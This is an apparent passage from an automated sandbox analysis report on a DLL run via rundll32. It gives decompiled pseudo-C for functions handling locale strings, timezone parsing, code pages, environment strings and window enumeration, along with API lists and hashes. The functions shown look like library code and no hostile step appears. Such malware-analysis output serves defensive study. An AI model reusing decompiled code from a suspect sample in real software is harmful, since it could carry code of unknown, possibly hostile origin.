				_t98 =  *(_t117 + 0x10);
				while(1) {
					_t110 = _t110 - 1;
					if( *_t98 == 0) {
						break;
					}
					_t98 = _t98 + 2;
					if(_t110 != 0) {
						continue;
					}
					_t110 = _t110 | 0xffffffff;
					break;
				}
				 *(_t117 + 0x14) =  *(_t117 + 0x14) + (_t98 | 0xffffffff) - _t110;
				goto L11;
			}

APIs

LCMapStringW.KERNEL32(00000000,00000100,1002E9CC,00000001,00000000,00000000,1002E9D0,00000024,10011077,?,00000100,?,000000FF,00000000,00000000,?), ref: 100146A3
GetLastError.KERNEL32(?,?), ref: 100146B5
LCMapStringW.KERNEL32(?,?,?,?,?,?,1002E9D0,00000024,10011077,?,00000100,?,000000FF,00000000,00000000,?), ref: 10014707
WideCharToMultiByte.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,1002E9D0,00000024,10011077,?,00000100,?,000000FF,00000000), ref: 10014762
WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 100147D4
LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000,?,?), ref: 100147F0
LCMapStringA.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 1001485C
_strncpy.LIBCMT ref: 10014881

Strings

@hvpYv, xrefs: 10014762, 100147D4

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast_strncpy
String ID: @hvpYv
API String ID: 4089183155-2766943729
Opcode ID: e301e7b9d994c16e817d1b18ad888207c882d149549df77b0cb176b4ec3c0a23
Instruction ID: be8df16c5dd18856016043c6e36cd0761b94307408ad1c360d8757dfebd17d40
Opcode Fuzzy Hash: e301e7b9d994c16e817d1b18ad888207c882d149549df77b0cb176b4ec3c0a23
Instruction Fuzzy Hash: A5714B7180025AEFDF11DFA0CC859DE7BB5FB09394B22412AF925AA1B0CB35CD91DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001F2BB Relevance: 16.6, APIs: 11, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1001F2BB(intOrPtr* __ecx) {
				signed int _t45;
				void* _t49;
				CHAR* _t50;
				signed int _t54;
				signed char _t60;
				struct HWND__* _t62;
				CHAR* _t63;
				signed int _t68;
				struct HINSTANCE__* _t81;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				void* _t89;

				E10011A8C(E1002A80E, _t87);
				_t85 = __ecx;
				_t68 =  *(__ecx + 0x5c);
				 *((intOrPtr*)(_t87 - 0x10)) = _t89 - 0x18;
				 *((intOrPtr*)(_t87 - 0x1c)) = __ecx;
				 *(_t87 - 0x18) =  *(__ecx + 0x58);
				_t45 = E10027747();
				_t81 =  *(_t45 + 0xc);
				if( *(_t85 + 0x54) != 0) {
					_t81 =  *(E10027747() + 0xc);
					_t45 = LoadResource(_t81, FindResourceA(_t81,  *(_t85 + 0x54), 5));
					 *(_t87 - 0x18) = _t45;
				}
				if( *(_t87 - 0x18) != 0) {
					_t45 = LockResource( *(_t87 - 0x18));
					_t68 = _t45;
				}
				if(_t68 != 0) {
					 *(_t87 - 0x14) = E1001EDFB(_t85);
					E10020B34();
					 *(_t87 - 0x20) =  *(_t87 - 0x20) & 0x00000000;
					__eflags =  *(_t87 - 0x14);
					if( *(_t87 - 0x14) != 0) {
						_t62 = GetDesktopWindow();
						__eflags =  *(_t87 - 0x14) - _t62;
						if( *(_t87 - 0x14) != _t62) {
							_t63 = IsWindowEnabled( *(_t87 - 0x14));
							__eflags = _t63;
							if(_t63 != 0) {
								EnableWindow( *(_t87 - 0x14), 0);
								 *(_t87 - 0x20) = 1;
							}
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) & 0x00000000;
					_push(_t85);
					E10021D7F();
					_t49 = E10020A8C(_t87,  *(_t87 - 0x14));
					_push(_t81);
					_push(_t49);
					_push(_t68);
					_t50 = E1001F0AE(_t85);
					__eflags = _t50;
					if(_t50 != 0) {
						__eflags =  *(_t85 + 0x38) & 0x00000010;
						if(( *(_t85 + 0x38) & 0x00000010) != 0) {
							_t83 = 4;
							_t60 = E100229FB(_t85);
							__eflags = _t60 & 0x00000001;
							if((_t60 & 0x00000001) != 0) {
								_t83 = 5;
							}
							E10020530(_t85, _t83);
						}
						__eflags =  *(_t85 + 0x1c);
						if( *(_t85 + 0x1c) != 0) {
							E10022C1F(_t85, 0, 0, 0, 0, 0, 0x97);
						}
					}
					 *(_t87 - 4) =  *(_t87 - 4) | 0xffffffff;
					__eflags =  *(_t87 - 0x20);
					if( *(_t87 - 0x20) != 0) {
						EnableWindow( *(_t87 - 0x14), 1);
					}
					__eflags =  *(_t87 - 0x14);
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *(_t85 + 0x1c);
						if(__eflags == 0) {
							SetActiveWindow( *(_t87 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t85 + 0x60))();
					E1001EE35(_t85, __eflags);
					__eflags =  *(_t85 + 0x54);
					if( *(_t85 + 0x54) != 0) {
						FreeResource( *(_t87 - 0x18));
					}
					_t54 =  *(_t85 + 0x40);
				} else {
					_t54 = _t45 | 0xffffffff;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t87 - 0xc));
				return _t54;
			}

APIs

__EH_prolog.LIBCMT ref: 1001F2C0
FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F2F8
LoadResource.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1001F300

Part of subcall function 10020B34: UnhookWindowsHookEx.USER32(?), ref: 10020B59

LockResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 1001F312
GetDesktopWindow.USER32 ref: 1001F33F
IsWindowEnabled.USER32(00000000), ref: 1001F34D
EnableWindow.USER32(00000000,00000000), ref: 1001F35C
EnableWindow.USER32(00000000,00000001), ref: 1001F3EB
GetActiveWindow.USER32 ref: 1001F3F6
SetActiveWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F404
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 1001F420

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeH_prologHookLoadLockUnhookWindows
String ID:
API String ID: 833315621-0
Opcode ID: 1f84151ef9ef92f50fe4379972704eab08b992c14362451c0c9a4ea825c6b16d
Instruction ID: 329a2a791b226240712562ebed41b0d0f7aebcabf2785b484657ceb6e67ce66d
Opcode Fuzzy Hash: 1f84151ef9ef92f50fe4379972704eab08b992c14362451c0c9a4ea825c6b16d
Instruction Fuzzy Hash: CA419E34900B15DBDB11DFA4D8897BEBBF5FF14711F60002DF112A62A1CBB4AE86CA61

Uniqueness

Uniqueness Score: -1.00%

Function 10019164 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 212
timeCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10019164(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t21;
				long _t22;
				char* _t24;
				signed int _t26;
				signed int _t27;
				int _t29;
				char* _t30;
				int _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				int _t36;
				int _t39;
				int _t41;
				int _t44;
				char* _t48;
				void* _t51;
				int _t52;
				void* _t56;
				void* _t58;
				int _t60;
				int _t63;
				signed int _t82;
				char* _t87;
				int _t89;
				void* _t90;

				_push(0x18);
				_push(0x1002f7b0);
				E10012CE0(__ebx, __edi, __esi);
				 *(_t90 - 0x20) = 0;
				E10014CDE(__ebx, 0, 7);
				 *(_t90 - 4) = 0;
				_t63 =  *0x1003a4d0; // 0x0
				 *(_t90 - 0x28) = _t63;
				 *0x1003a5b4 = 0;
				 *0x10037c0c =  *0x10037c0c | 0xffffffff;
				 *0x10037c00 =  *0x10037c00 | 0xffffffff;
				_t87 = E1001B17B("TZ");
				 *((intOrPtr*)(_t90 - 0x24)) = _t87;
				if(_t87 == 0 ||  *_t87 == 0) {
					_t21 =  *0x1003a5b8; // 0x0
					__eflags = _t21;
					if(_t21 != 0) {
						_push(_t21);
						E1001111B();
						 *0x1003a5b8 = 0;
					}
					_t22 = GetTimeZoneInformation(0x1003a508);
					__eflags = _t22 - 0xffffffff;
					if(_t22 == 0xffffffff) {
						goto L31;
					} else {
						 *0x1003a5b4 = 1;
						_t26 = 0x1003a508->Bias; // 0x0
						_t27 = _t26 * 0x3c;
						 *0x10037b68 = _t27;
						__eflags =  *0x1003a54e; // 0x0
						if(__eflags != 0) {
							_t82 =  *0x1003a55c; // 0x0
							_t39 = _t27 + _t82 * 0x3c;
							__eflags = _t39;
							 *0x10037b68 = _t39;
						}
						__eflags =  *0x1003a5a2; // 0x0
						if(__eflags == 0) {
							L22:
							 *0x10037b6c = 0;
							 *0x10037b70 = 0;
							goto L23;
						} else {
							_t36 =  *0x1003a5b0; // 0x0
							__eflags = _t36;
							if(_t36 == 0) {
								goto L22;
							}
							 *0x10037b6c = 1;
							 *0x10037b70 = (_t36 -  *0x1003a55c) * 0x3c;
							L23:
							_t29 = WideCharToMultiByte(_t63, 0, 0x1003a50c, 0xffffffff,  *0x10037bf8, 0x3f, 0, _t90 - 0x1c);
							__eflags = _t29;
							if(_t29 == 0) {
								L26:
								_t30 =  *0x10037bf8; // 0x10037b78
								 *_t30 = 0;
								L27:
								_t32 = WideCharToMultiByte(_t63, 0, 0x1003a560, 0xffffffff,  *0x10037bfc, 0x3f, 0, _t90 - 0x1c);
								__eflags = _t32;
								if(_t32 == 0) {
									L30:
									_t33 =  *0x10037bfc; // 0x10037bb8
									 *_t33 = 0;
									goto L31;
								}
								__eflags =  *(_t90 - 0x1c);
								if( *(_t90 - 0x1c) != 0) {
									goto L30;
								}
								_t34 =  *0x10037bfc; // 0x10037bb8
								_t34[0x3f] = 0;
								goto L31;
							}
							__eflags =  *(_t90 - 0x1c);
							if( *(_t90 - 0x1c) != 0) {
								goto L26;
							}
							_t35 =  *0x10037bf8; // 0x10037b78
							_t35[0x3f] = 0;
							goto L27;
						}
					}
				} else {
					_t41 =  *0x1003a5b8; // 0x0
					if(_t41 == 0) {
						L6:
						_t44 = E10011233(E10012000(_t87) + 1);
						 *0x1003a5b8 = _t44;
						if(_t44 == 0) {
							L31:
							_t24 = E10010E5E(_t90 - 0x10, 0xffffffff);
							L47:
							return E10012D1B(_t24);
						}
						E10018100(_t44, _t87);
						 *(_t90 - 4) =  *(_t90 - 4) | 0xffffffff;
						E1001937F();
						E10019990( *0x10037bf8, _t87, 3);
						_t48 =  *0x10037bf8; // 0x10037b78
						_t48[3] = 0;
						_t89 = _t87 + 3;
						if( *_t89 == 0x2d) {
							 *(_t90 - 0x20) = 1;
							_t89 = _t89 + 1;
						}
						 *0x10037b68 = E1001144B(_t89) * 0xe10;
						while(1) {
							_t51 =  *_t89;
							if(_t51 != 0x2b && (_t51 < 0x30 || _t51 > 0x39)) {
								break;
							}
							_t89 = _t89 + 1;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							L42:
							__eflags =  *(_t90 - 0x20);
							if( *(_t90 - 0x20) != 0) {
								 *0x10037b68 =  ~( *0x10037b68);
							}
							_t52 =  *_t89;
							 *0x10037b6c = _t52;
							__eflags = _t52;
							if(_t52 == 0) {
								_t24 =  *0x10037bfc; // 0x10037bb8
								 *_t24 = 0;
							} else {
								E10019990( *0x10037bfc, _t89, 3);
								_t24 =  *0x10037bfc; // 0x10037bb8
								_t24[3] = 0;
							}
							goto L47;
						}
						_t89 = _t89 + 1;
						 *0x10037b68 =  *0x10037b68 + E1001144B(_t89) * 0x3c;
						while(1) {
							_t56 =  *_t89;
							__eflags = _t56 - 0x30;
							if(_t56 < 0x30) {
								break;
							}
							__eflags = _t56 - 0x39;
							if(_t56 > 0x39) {
								break;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						__eflags =  *_t89 - 0x3a;
						if( *_t89 != 0x3a) {
							goto L42;
						}
						_t89 = _t89 + 1;
						 *0x10037b68 =  *0x10037b68 + E1001144B(_t89);
						while(1) {
							_t58 =  *_t89;
							__eflags = _t58 - 0x30;
							if(_t58 < 0x30) {
								goto L42;
							}
							__eflags = _t58 - 0x39;
							if(_t58 > 0x39) {
								goto L42;
							}
							_t89 = _t89 + 1;
							__eflags = _t89;
						}
						goto L42;
					}
					if(E10018070(_t87, _t41) == 0) {
						goto L31;
					} else {
						_t60 =  *0x1003a5b8; // 0x0
						if(_t60 != 0) {
							_push(_t60);
							E1001111B();
						}
						goto L6;
					}
				}
			}

APIs

__lock.LIBCMT ref: 10019177

Part of subcall function 10014CDE: EnterCriticalSection.KERNEL32(?,?,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?), ref: 10014D06

_strlen.LIBCMT ref: 100191E9
_strcat.LIBCMT ref: 10019206
_strncpy.LIBCMT ref: 1001921F

Part of subcall function 1001111B: __lock.LIBCMT ref: 10011139
Part of subcall function 1001111B: RtlFreeHeap.NTDLL(00000000,?,1002E808,0000000C,10014CC2,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010), ref: 10011180

GetTimeZoneInformation.KERNEL32(1003A508,1002F7B0,00000018,10019779,1002F7C0,00000008,100136D4,?,?,0000003C,00000000,?,?,0000003C,00000000,?), ref: 10019288
WideCharToMultiByte.KERNEL32(00000000,00000000,1003A50C,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 10019316
WideCharToMultiByte.KERNEL32(00000000,00000000,1003A560,000000FF,0000003F,00000000,?,?,0000003C,00000000,?,?,0000003C,00000000,?,00000001), ref: 1001934A

Strings

@hvpYv, xrefs: 10019310

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide__lock$CriticalEnterFreeHeapInformationSectionTimeZone_strcat_strlen_strncpy
String ID: @hvpYv
API String ID: 3757401926-2766943729
Opcode ID: a3a12b6914afff0b4e7b31ad668b4ace3caeeea21f36db9566a54eb37af1babf
Instruction ID: 4dbca8054f4039b4849f5a9e5fe9b23a7014a1c273ae3838594a4a591fb459e4
Opcode Fuzzy Hash: a3a12b6914afff0b4e7b31ad668b4ace3caeeea21f36db9566a54eb37af1babf
Instruction Fuzzy Hash: C771B774C04661AEE726CB28CC85B99BBF4FB46750F60011AE4A4DF2E2D730DAC2CB15

Uniqueness

Uniqueness Score: -1.00%

Function 10019AF7 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10019AF7(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				int _t96;
				void* _t98;
				short* _t99;

				_push(0x38);
				_push(0x1002f7e0);
				E10012CE0(__ebx, __edi, __esi);
				_t54 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t98 - 0x1c)) = _t54;
				 *(_t98 - 0x34) = 0;
				 *(_t98 - 0x44) = 0;
				_t81 =  *( *(_t98 + 0x14));
				 *(_t98 - 0x40) = _t81;
				 *(_t98 - 0x3c) = 0;
				_t56 =  *(_t98 + 8);
				if(_t56 ==  *(_t98 + 0xc)) {
					_t82 =  *(_t98 - 0x48);
					goto L31;
				} else {
					_t85 = _t98 - 0x30;
					if(GetCPInfo(_t56, _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1 && GetCPInfo( *(_t98 + 0xc), _t98 - 0x30) != 0 &&  *(_t98 - 0x30) == 1) {
						 *(_t98 - 0x3c) = 1;
					}
					if( *(_t98 - 0x3c) == 0) {
						_t96 =  *(_t98 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10012000( *(_t98 + 0x10));
							_pop(_t85);
							_t96 = _t77 + 1;
							__eflags = _t96;
						} else {
							_t96 = _t81;
						}
						 *(_t98 - 0x38) = _t96;
					}
					if( *(_t98 - 0x3c) != 0) {
						L14:
						 *(_t98 - 4) = 0;
						E100116D0(_t96 + _t96 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t98 - 0x18) = _t99;
						_t82 = _t99;
						 *(_t98 - 0x48) = _t82;
						E10012400(_t82, 0, _t96 + _t96);
						 *(_t98 - 4) =  *(_t98 - 4) | 0xffffffff;
						_t112 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10),  *(_t98 - 0x40), _t82, _t96);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t98 - 0x44);
								if( *(_t98 - 0x44) != 0) {
									_push(_t82);
									E1001111B();
								}
								_t57 =  *(_t98 - 0x34);
								goto L34;
							}
							__eflags =  *(_t98 + 0x18);
							if( *(_t98 + 0x18) == 0) {
								__eflags =  *(_t98 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t96);
									_push(1);
									_t69 = E10013955(_t82, 0, _t96, __eflags);
									 *(_t98 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, _t69, _t96, 0, 0);
										__eflags = _t70;
										if(_t70 != 0) {
											__eflags =  *(_t98 - 0x40) - 0xffffffff;
											if( *(_t98 - 0x40) != 0xffffffff) {
												 *( *(_t98 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t98 - 0x34));
											E1001111B();
											 *(_t98 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t96 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96, 0, 0, 0, 0);
								__eflags = _t96;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t98 + 0xc), 0, _t82, _t96,  *(_t98 + 0x18),  *(_t98 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t98 - 0x34) =  *(_t98 + 0x18);
							}
							goto L31;
						} else {
							_push(_t96);
							_push(2);
							_t82 = E10013955(_t82, 0, _t96, _t112);
							if(_t82 != 0) {
								 *(_t98 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t96 = MultiByteToWideChar( *(_t98 + 8), 1,  *(_t98 + 0x10), _t81, 0, 0);
						 *(_t98 - 0x38) = _t96;
						if(_t96 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E10012D1B(E10011A49(_t57,  *((intOrPtr*)(_t98 - 0x1c))));
						}
						goto L14;
					}
				}
			}

APIs

GetCPInfo.KERNEL32(00000000,?,1002F7E0,00000038,100187A5,?,00000000,00000000,100129C0,00000000,00000000,1002F210,0000001C,100126EF,00000001,00000020), ref: 10019B35
GetCPInfo.KERNEL32(00000000,00000001), ref: 10019B48
_strlen.LIBCMT ref: 10019B6C
MultiByteToWideChar.KERNEL32(00000000,00000001,100129C0,?,00000000,00000000), ref: 10019B8D

Strings

@hvpYv, xrefs: 10019C30, 10019C51, 10019C78

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID: @hvpYv
API String ID: 1335377746-2766943729
Opcode ID: bfd56e426d39671fa2e1d78d2a0964afa57495d4f276f40384039733b7fe3f2d
Instruction ID: 294774cc866d07f8cfe9786a50fecf10184bee5b6bc6581c56cb6a99e577165d
Opcode Fuzzy Hash: bfd56e426d39671fa2e1d78d2a0964afa57495d4f276f40384039733b7fe3f2d
Instruction Fuzzy Hash: 65516C71900219EBDF21CFA5EDC5D9EBBF9EF85790F20021AF854AA150D7319D91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10016C53 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E10016C53() {
				int _v4;
				int _v8;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1003a4a8; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					if(_t7 != 1) {
						if(_t7 == _t38 || _t7 == _t29) {
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							if(_t37 == _t29) {
								goto L20;
							}
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E10011233(_t8 - _t37 + 1);
								if(_t34 != _t29) {
									E10011CC0(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
							} while ( *_t8 != _t29);
							goto L25;
						} else {
							L20:
							return 0;
						}
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E10011233(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									if(WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29) == 0) {
										_push(_v8);
										E1001111B();
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
					_t36 = GetEnvironmentStringsW();
					if(_t36 == _t29) {
						goto L20;
					}
					goto L9;
				}
				_t36 = GetEnvironmentStringsW();
				if(_t36 == 0) {
					if(GetLastError() != 0x78) {
						_t7 =  *0x1003a4a8; // 0x1
					} else {
						_t7 = _t38;
						 *0x1003a4a8 = _t7;
					}
					goto L6;
				} else {
					 *0x1003a4a8 = 1;
					goto L7;
				}
			}

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016C6F
GetLastError.KERNEL32(?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016C83
GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016CA5
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,100117D6), ref: 10016CD9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,100117D6,?,?), ref: 10016CFB
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016D14
GetEnvironmentStrings.KERNEL32(00000000,?,?,?,?,?,100117D6,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10016D2A
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 10016D66

Strings

@hvpYv, xrefs: 10016CC2

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$ErrorLast
String ID: @hvpYv
API String ID: 883850110-2766943729
Opcode ID: 9995ca29ea17e4230e41c8290f683c66e812ba8dc88be33dde8572edb321261e
Instruction ID: 926af3bb7882c21ced6ecf110d92c77dad54a8330243c493b836114948af40df
Opcode Fuzzy Hash: 9995ca29ea17e4230e41c8290f683c66e812ba8dc88be33dde8572edb321261e
Instruction Fuzzy Hash: 9E31DB72E092666FD710EF749CC482FBADCEB4D2D47220829F985CB111E571DCC582B1

Uniqueness

Uniqueness Score: -1.00%

Function 10006B40 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006B40(long __ecx) {
				long _t73;

				_t73 = __ecx;
				E10005C40(__ecx);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				_t71 = __ecx + 0x9b0;
				E1001D3F5(__ecx + 0x9b0,  *((intOrPtr*)(__ecx + 0x70)), "Title", 0, 0x8c, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(__ecx + 0x9b0,  *((intOrPtr*)(__ecx + 0x70)), "Handle", 2, 0x32, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(__ecx + 0x9b0,  *((intOrPtr*)(__ecx + 0x70)), "Visible", 2, 0x3c, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(_t71,  *((intOrPtr*)(__ecx + 0x70)), "Class Name", 0, 0x78, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(_t71,  *((intOrPtr*)(__ecx + 0x70)), "Position", 0, 0x50, 0xffffffff);
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x70)) + 1;
				E1001D3F5(_t71,  *((intOrPtr*)(__ecx + 0x70)), "Size", 0, 0x50, 0xffffffff);
				E10022AD3(__ecx + 0x870, 5);
				E10022AD3(__ecx + 0x820, 5);
				E10022AD3(__ecx + 0x780, 5);
				E10022AD3(__ecx + 0x7d0, 5);
				E10022AD3(__ecx + 0x960, 0);
				E10022AD3(__ecx + 0x8c0, 0);
				SendMessageA( *(__ecx + 0x9cc), 0x1009, 0, 0);
				EnumWindows(E10006560, _t73);
				return SendMessageA( *(_t73 + 0x9cc), 0x1030, 0, 0);
			}

APIs

Part of subcall function 10005C40: SendMessageA.USER32(?,00001009,00000000,00000000), ref: 10005C5B
Part of subcall function 10005C40: SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 10005C76

Part of subcall function 1001D3F5: SendMessageA.USER32(?,0000101B,?,00000005), ref: 1001D43E

Part of subcall function 10022AD3: ShowWindow.USER32(?,?,1000EAF7,00000000,?,?), ref: 10022AE0

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 10006C5E
EnumWindows.USER32(Function_00006560), ref: 10006C66
SendMessageA.USER32(?,00001030,00000000,00000000), ref: 10006C7C

Strings

Size, xrefs: 10006BE7
Title, xrefs: 10006B58
Class Name, xrefs: 10006BAF
Handle, xrefs: 10006B77
Visible, xrefs: 10006B96
Position, xrefs: 10006BCE

Memory Dump Source

